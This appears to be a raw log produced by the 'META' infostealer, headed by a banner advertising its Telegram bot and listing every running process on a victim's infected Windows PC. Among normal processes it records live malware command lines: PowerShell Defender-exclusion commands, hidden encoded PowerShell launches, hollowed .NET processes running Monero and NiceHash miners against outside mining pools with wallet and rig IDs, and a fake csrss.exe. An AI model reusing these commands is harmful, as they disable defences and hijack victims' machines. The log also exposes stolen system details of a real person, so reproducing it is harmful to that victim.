
***********************************************

* _ _ _ _ *
* / \ / \ / \ / \ *
* ( M | E | T | A ) *
* \_/ \_/ \_/ \_/ *
* *
* Telegram: https://t.me/metastealer_bot *
***********************************************

ID: 740, Name: csrss.exe, CommandLine:


===============
ID: 800, Name: winlogon.exe, CommandLine: winlogon.exe
===============
ID: 468, Name: fontdrvhost.exe, CommandLine: "fontdrvhost.exe"
===============
ID: 1196, Name: dwm.exe, CommandLine: "dwm.exe"
===============
ID: 4176, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 4156, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
===============
ID: 3660, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
===============
ID: 5128, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
===============
ID: 5372, Name: ctfmon.exe, CommandLine: "ctfmon.exe"
===============
ID: 5804, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 5932, Name: igfxEM.exe, CommandLine: "C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_38cfab2b652e4701\igfxEM.exe"
===============
ID: 6096, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 6620, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 6792, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 7012, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 6304, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 4596, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 6048, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\SecurityHealthSystray.exe"
===============
ID: 8152, Name: OneDrive.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
===============
ID: 5840, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\Discord.exe"
===============
ID: 7232, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 8120, Name: Discord.exe, CommandLine: C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\Discord.exe --type=crashpad-handler --user-data-dir=C:\Users\ASUS\AppData\Roaming\discord /prefetch:7 --no-rate-limit --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\ASUS\AppData\Roaming\discord\Crashpad --url=https://sentry.io/api/146342/minidump/?sentry_key=384ce4413de74fe0be270abe03b2b35a "--annotation=_companyName=Discord Inc." --annotation=_productName=Discord --annotation=_version=1.0.9012 --annotation=plat=Win32 --annotation=prod=Electron --annotation=ver=22.3.2 --initial-client-data=0x49c,0x480,0x414,0x498,0x410,0x85aef78,0x85aef88,0x85aef94
===============
ID: 7296, Name: IDMan.exe, CommandLine: "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot
===============
ID: 8352, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 8580, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\Discord.exe" --type=gpu-process --user-data-dir="C:\Users\ASUS\AppData\Roaming\discord" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
===============
ID: 8768, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\Discord.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\ASUS\AppData\Roaming\discord" --mojo-platform-channel-handle=2200 --field-trial-handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 9304, Name: RtkAudUService64.exe, CommandLine: C:\Windows\System32\RtkAudUService64.exe -background
===============
ID: 8684, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\Discord.exe" --type=renderer --user-data-dir="C:\Users\ASUS\AppData\Roaming\discord" --app-user-model-id=com.squirrel.Discord.Discord --app-path="C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\resources\app.asar" --no-sandbox --no-zygote --autoplay-policy=no-user-gesture-required --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1681893985127383 --launch-time-ticks=59915891 --mojo-platform-channel-handle=3476 --field-trial-handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --enable-node-leakage-in-renderers /prefetch:1
===============
ID: 10672, Name: java.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Java\jre8\bin\java.exe --expose-gc C:\Users\ASUS\AppData\Roaming\Java\jre8\bin\java.exe:jnl
===============
ID: 11100, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
===============
ID: 9112, Name: Discord.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Discord\app-1.0.9012\Discord.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\ASUS\AppData\Roaming\discord" --mojo-platform-channel-handle=2648 --field-trial-handle=1796,i,7767546970753870870,4083573489537264221,131072 --disable-features=HardwareMediaKeyHandling,MediaSessionService,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
===============
ID: 10924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup
===============
ID: 9092, Name: LockApp.exe, CommandLine: "C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mca
===============
ID: 392, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 2848, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -Embedding
===============
ID: 4888, Name: RtkUWP.exe, CommandLine: "C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.1.137.0_x64__dt26b99r8h8gj\RtkUWP.exe" -ServerName:App.AppX2vzv616czv2j97f46vn25b5ksjvhr8z1.mca
===============
ID: 2004, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\ApplicationFrameHost.exe -Embedding
===============
ID: 7996, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 5712, Name: wpscloudsvr.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Kingsoft\WPS Office\11.2.0.11516\office6\wpscloudsvr.exe" /wpscloudlaunch /run_plugin /plugin_name=ktaskschdtool /plugin_entry=ktaskschdtool.dll /task=wpsexternal /launchtask /ver=1.0 /start_from=task_external
===============
ID: 5012, Name: mstsca.exe, CommandLine: C:\Users\ASUS\AppData\Roaming\Microsoft\Network\mstsca.exe
===============
ID: 6548, Name: wpscenter.exe, CommandLine: "C:\Users\ASUS\AppData\Local\Kingsoft\WPS Office\11.2.0.11516\office6/wpscenter.exe" Run -Entry=EntryPoint "C:\Users\ASUS\AppData\Roaming\Kingsoft/wps/addons/pool/win-i386/kdocreminder_1.1.2021.65/kdocreminder.dll"
===============
ID: 4712, Name: 3A56.exe, CommandLine: C:\Users\ASUS\AppData\Local\f46f4670-506e-4b11-84f8-99261ddf6dc7\3A56.exe --Task
===============
ID: 8464, Name: powershell.exe, CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 4756, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 8524, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 10396, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 4892, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 668, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 8344, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 11252, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 6764, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 4580, Name: explorer.exe, CommandLine: C:\Windows\explorer.exe
===============
ID: 6588, Name: explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe
===============
ID: 2744, Name: vbc.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
===============
ID: 7360, Name: WBGRGV.exe, CommandLine: C:\ProgramData\portableWin\WBGRGV.exe
===============
ID: 9088, Name: powershell.exe, CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
===============
ID: 5584, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 8160, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
===============
ID: 6148, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -Embedding
===============
ID: 1324, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\Pictures\Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
===============
ID: 10920, Name: koPamCs_vM7jHvyfackwRCVE.exe, CommandLine: "C:\Users\ASUS\Pictures\Minor Policy\koPamCs_vM7jHvyfackwRCVE.exe"
===============
ID: 6660, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
===============
ID: 9872, Name: lttZ9ZMSNstwv47LDDLSi0EM.exe, CommandLine: "C:\Users\ASUS\Pictures\Minor Policy\lttZ9ZMSNstwv47LDDLSi0EM.exe"
===============
ID: 1316, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 9568, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 5524, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1929564397
===============
ID: 8308, Name: HxTsr.exe, CommandLine: "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21374.0_x64__8wekyb3d8bbwe\HxTsr.exe" -ServerName:Hx.IPC.Server
===============
ID: 9752, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\RuntimeBroker.exe -Embedding
===============
ID: 11124, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 5996, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 6596, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9156, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 244, Name: wnb70KIsW65hvwPVbukgwPFK.exe, CommandLine: "C:\Users\ASUS\Pictures\Minor Policy\wnb70KIsW65hvwPVbukgwPFK.exe"
===============
ID: 7892, Name: is-O532D.tmp, CommandLine: "C:\Users\ASUS\AppData\Local\Temp\is-BEIKE.tmp\is-O532D.tmp" /SL4 $C02C6 "C:\Users\ASUS\Pictures\Minor Policy\wnb70KIsW65hvwPVbukgwPFK.exe" 2562561 56320
===============
ID: 11468, Name: powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
===============
ID: 11964, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 13012, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 4172, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --restore-last-session
===============
ID: 6132, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\ASUS\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=112.0.5615.122 --initial-client-data=0xe8,0x188,0x1c4,0xe4,0x1c8,0x7ffafcdeaa60,0x7ffafcdeaa70,0x7ffafcdeaa80
===============
ID: 10716, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 5332, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 4560, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 5152, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1900 --field-trial-handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:2
===============
ID: 10016, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1980,i,3186326931205788530,10113752326107017979,131072 /prefetch:8
===============
ID: 4200, Name: wup.exe, CommandLine: C:\Users\ASUS\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o dxpools.net:40001 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --tls --nicehash -o dxpools.net:443 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --tls --nicehash -o dxpools.net:80 --rig-id 170aff50-3414-460e-ac6b-4ab10e102304 --nicehash --http-port 3433 --http-access-token 170aff50-3414-460e-ac6b-4ab10e102304 --randomx-wrmsr=-1
===============
ID: 12468, Name: csrss.exe, CommandLine: C:\Windows\rss\csrss.exe -hide 4200
